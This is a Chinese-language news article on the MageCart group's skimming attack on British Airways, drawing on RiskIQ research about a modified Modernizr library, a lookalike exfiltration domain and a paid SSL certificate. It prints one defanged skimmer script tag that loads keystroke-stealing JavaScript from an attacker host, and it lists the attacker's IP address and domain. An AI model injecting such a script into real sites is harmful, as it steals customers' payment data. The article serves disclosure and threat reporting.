研究人员进行的调查显示，英国航空公司数据泄露事件追查到是一个名为MageCart的犯罪团伙。该组织自2015年以来一直活跃，并且许多电子商务网站遭到破坏，以窃取支付卡和其他敏感数据。该小组在目标网站中注入一个skimmer 脚本来虹吸支付卡数据，一旦攻击者成功破坏了网站，它就会在HTML模板中添加嵌入的Javascript。

下面是一个名为MagentoCore的示例脚本  。

<script type=”text/javascript” src=”hxxps://magentocore.net/mage/mage.js”></script>

此  脚本  记录客户的击键并将其发送到受攻击者控制的服务器。

攻击者植入javascript代码窃取数据

根据研究人员的说法，MageCart小组对英国航空公司进行了有针对性的攻击，并使用该脚本的定制版本来进行持续性攻击。

黑客使用专用基础设施来对这家航空公司进行特定攻击。

“这次袭击中使用的基础设施只是考虑到了英国航空公司，故意针对的脚本将与正常的支付处理融为一体，以避免被发现。我们在域名baways.com上看到了这方面的证据   以及丢弃服务器路径。“

专家分析了网站加载的所有脚本，并搜索了最近的变化证据。

专家注意到Modernizr JavaScript库中的一些变化，攻击者在底部添加了一些代码行，以避免给脚本带来问题。JavaScript库于格林威治标准时间8月21日20:49修改。

恶意脚本是从英国航空公司网站上的行李认领信息页面加载的，攻击者添加的代码允许Modernizr将付款信息从客户发送到攻击者的服务器。

该脚本允许攻击者从网站和移动应用程序中窃取用户的数据。

从英国航空公司窃取的数据以JSON的形式发送到baways.com上托管的服务器，该服务器类似于航空公司使用的合法域。

攻击者使用SSL防止被发现

攻击者从Comodo购买了SSL证书，以避免引起怀疑

“该域名   位于89.47.162.248，位于罗马尼亚，实际上是位于立陶宛的名为Time4VPS的VPS提供商的一部分。演员还为服务器加载了SSL证书。有趣的是，他们决定使用Comodo的付费证书而不是免费的LetsEncrypt证书，这可能使它看起来像一个合法的服务器：“继续RiskIQ。

目前还不清楚MageCart如何在英国航空公司网站上设法注入恶意代码。

“正如我们在这次袭击中看到的那样， Magecart 建立了定制的，有针对性的基础设施，专门与英国航空公司网站融为一体，尽可能避免被发现。虽然我们永远无法知道攻击者在英国航空公司服务器上的覆盖范围，但他们能够修改该站点的资源这一事实告诉我们访问权限很大，并且他们可能在攻击开始之前就已经访问了很久关于面向网络的资产的脆弱性，这是一个明显的提醒。“RiskIQ总结道。